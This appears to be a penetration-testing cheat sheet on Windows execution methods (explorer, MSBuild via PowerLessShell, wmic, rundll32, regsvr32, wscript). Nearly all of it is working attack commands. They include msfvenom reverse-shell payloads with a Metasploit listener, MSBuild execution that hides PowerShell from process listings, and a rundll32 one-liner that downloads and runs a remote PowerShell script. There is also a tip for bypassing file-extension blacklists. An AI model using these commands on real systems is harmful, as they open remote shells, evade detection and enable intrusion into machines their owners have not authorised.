File Execution Methods


explorer.exe /root,"C:\Windows\System32\calc.exe"
explorer.exe /root,"C:\Windows\Temp\Shell.exe"


PowerLessShell is a Python-based tool that generates malicious code to run on a target machine without showing an instance of the PowerShell process. PowerLessShell relies on abusing the Microsoft Build Engine (MSBuild), a platform for building Windows applications, to execute remote code.
After cloning the repository, generate a msfvenom payload as per the syntax shown below.
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=<IP> LPORT=445 -f psh-reflection > shell.ps1
Set a Metasploit listener
msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost <IP>;set lport 445;exploit"
From the PowerLessShell repository build the project file.
python2 -type powershell -source ~/opt/shell.ps1 -output ~/opt/shell.csproj
After building completes, transfer the .csproj file to the target system. Then use the command below to execute. (Framework versions will vary).
c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\windows\temp\shell.csproj
Wait a short while...
Where we should land a shell.
Checking the running processes on the target system whilst the shell is active shows no PowerShell.exe processes' running.


# Execute binary on local system
wmic.exe process call create c\windows\temp\Shell.exe
# Execute binary on remote system
wmic.exe /node:"" process call create "Shell.exe"


# Execute JavaScript script that runs a PowerShell script from a remote server
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<File.ps1>');"
# Execute a JavaScript script that runs calc.exe.
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");\"calc\");window.close()");
# Execute a DLL on a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
rundll32.exe \\\share\payload.dll,EntryPoint


msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=445 -f dll -a x86 > Shell.dll
Upload to target system and execute.
regsvr32.exe c:\windows\temp\shell.dll


Wscript can be used to run vbs file's which can be executed within text files to bypass file extension blacklisting.
c:\Windows\System32>wscript /e:VBScript c:\Users\moe\Desktop\shell.txt